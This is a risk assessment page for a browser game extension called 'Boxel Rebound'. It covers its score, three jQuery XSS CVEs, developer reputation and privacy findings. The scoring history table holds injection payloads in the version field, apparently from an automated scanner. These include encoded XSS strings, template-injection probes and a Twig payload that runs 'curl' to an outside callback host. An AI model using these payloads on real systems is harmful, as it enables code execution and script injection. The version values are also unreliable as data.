Boxel Rebound
iginnfkhmmfhlkagcmpgofnjhanpmklb
Risk Score
3.14
Risk Level:
Low
Recommendation:
🟢 LOW RISK — review
Top Risks
- jquery@3.3.1 bundles 3 moderate XSS CVEs (CVE-2019-11358, CVE-2020-11022, CVE-2020-11023); no CSP amplifies risk.
- Developer uses free-webmail email (gmail) with no developer name listed.
- last_updated missing — maintenance posture unknown; stale library version reinforces concern.
- description_promise flags is_shell_pattern=true; extension appears to be a game wrapper.
- Privacy policy third_party_silence=true; no explicit statement on third-party data sharing.
Evidence
- cve_moderate_x3_jquery crx jquery@3.3.1 has 3 moderate CVEs (XSS); fixed_in 3.5.0. No CSP present on MV3 extension.
- no_csp_present manifest content_security_policy is null; no CSP defined, raising DOM-XSS exposure from CVE-laden jQuery.
- dom_sink_innerhtml_userctrl crx Clock.js assigns timer variables to innerHTML — DOM-XSS sink, elevated by missing CSP + CVEs.
- free_webmail_no_devname store developer_email=deben3@gmail.com; developer_name is empty. Reputation penalty applies.
- verified_publisher_featured store verified_publisher=true AND is_featured_by_google=true; reputation discounts applied.
- shell_pattern_game store description_promise.is_shell_pattern=true; game wrapper extension with 1M installs.
- maintenance_unknown store last_updated and months_since_update are null; stale library version suggests possible abandonment.
- privacy_third_party_silence api Privacy policy fetched, scoped, retention present, but third_party_silence=true; +1.0 applied.
CVE Exposures (3)
| CVE | Library | Severity | Fixed in | Summary |
|---|---|---|---|---|
| CVE-2019-11358 | jquery@3.3.1 | moderate | 3.4.0 | XSS in jQuery as used in Drupal, Backdrop CMS, and other products |
| CVE-2020-11022 | jquery@3.3.1 | moderate | 3.5.0 | Potential XSS vulnerability in jQuery |
| CVE-2020-11023 | jquery@3.3.1 | moderate | 3.5.0 | Potential XSS vulnerability in jQuery |
Permissions Breakdown
- storage low Used to save game progress/settings locally; minimal risk.
Pillar Scores
Permissions0.30
Reputation4.00
Network0.00
Webstore4.50
Maintenance5.00
Privacy1.00
Code Quality2.00
CVE Exposure3.00
Scoring History
| %76%33%2E%36%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%59%30%53%56%28%39%36%38%39%34%29%22 | 2.72 | Low | allow | 2026-08-05 |
| <%={{={@{#{${dfb}}%> | 2.17 | Low | allow | 2026-08-05 |
| v3.6&n962341=v986828 | 3.47 | Low | review | 2026-08-05 |
| fsssiedx<sssiedx | 3.27 | Low | review | 2026-08-04 |
| fsssiedxa xx psssiedx | 2.49 | Low | review | 2026-08-03 |
| fsssiedxa"sssiedx | 2.77 | Low | review | 2026-08-03 |
| sssieddrubricxsx | 2.27 | Low | allow | 2026-08-03 |
| v3.69336"();}]9387 | 3.41 | Low | review | 2026-07-29 |
| v3.6"sTYLe='zzz:Expre/**/SSion(RG9z(9538))'bad=" | 2.19 | Low | allow | 2026-07-29 |
| v3.6" pmGd=RG9z([!+!]) Ym6=" | 2.49 | Low | review | 2026-07-29 |
| dfb{{98991*97996}}xca | 3.51 | Low | allow | 2026-07-29 |
| bfgx5961%C0%BEz1%C0%BCz2a%90bcxhjl5961 | 2.07 | Low | allow | 2026-07-29 |
| "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") | 2.61 | Low | allow | 2026-07-29 |
| <th:t="${dfb}#foreach | 2.29 | Low | allow | 2026-07-29 |
| {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitcugetotqzof0ed5.bxss.me")}} | 2.48 | Low | review | 2026-07-29 |
| v3.6&n969859=v921023 | 1.72 | Low | review | 2026-07-29 |
| v3.6 | 3.14 | Low | review | 2026-06-16 |
Bookkeeping
Rubric v3.6
Scored at 2026-06-16 07:43
Listing SHA
32b610b6071e…
Force block
— not fired
Score recovered
no
Elapsed
26.3s